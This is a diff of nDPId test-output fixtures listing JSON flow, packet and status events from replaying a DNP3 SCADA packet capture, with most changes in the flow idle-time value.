-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1097501938503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1097501938503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1097501938503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097501938503,"flow_last_seen":1097501938504,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097501938504,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097501938503,"flow_last_seen":1097501938503,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097501938503,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1097501938503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1097501938503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1097501938503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097501938503,"flow_last_seen":1097501938504,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097501938504,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":40,"packets-processed":39,"total-skipped-flows":0,"total-l4-data-len":345,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1097502623045} -00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097502623045,"flow_last_seen":1097502623045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097502623045,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1097502623045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1097502623045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1097502623045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097502623045,"flow_last_seen":1097502623047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097502623047,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097502623045,"flow_last_seen":1097502623045,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097502623045,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1097502623045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1097502623045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1097502623045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097502623045,"flow_last_seen":1097502623047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097502623047,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":79,"packets-processed":78,"total-skipped-flows":0,"total-l4-data-len":540,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1097504102255} -00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097504102255,"flow_last_seen":1097504102255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097504102255,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1097504102255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1097504102255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1097504102255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097504102255,"flow_last_seen":1097504102257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097504102257,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097502623045,"flow_last_seen":1097502648678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097504103602,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097504102255,"flow_last_seen":1097504102255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097504102255,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1097504102255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1097504102255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1097504102255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097504102255,"flow_last_seen":1097504102257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097504102257,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097502623045,"flow_last_seen":1097502648678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097504103602,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":217,"packets-processed":216,"total-skipped-flows":0,"total-l4-data-len":3957,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":3,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1097505644006} -00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097505644006,"flow_last_seen":1097505644006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097505644006,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1097505644006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1097505644006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1097505644006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097505644006,"flow_last_seen":1097505719035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097505719035,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097505644006,"flow_last_seen":1097505644006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097505644006,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1097505644006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1097505644006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1097505644006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097505644006,"flow_last_seen":1097505719035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097505719035,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":352,"packets-processed":351,"total-skipped-flows":0,"total-l4-data-len":5682,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":4,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1097507785883} -00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097507785883,"flow_last_seen":1097507785883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097507785883,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1097507785883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1097507785883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} 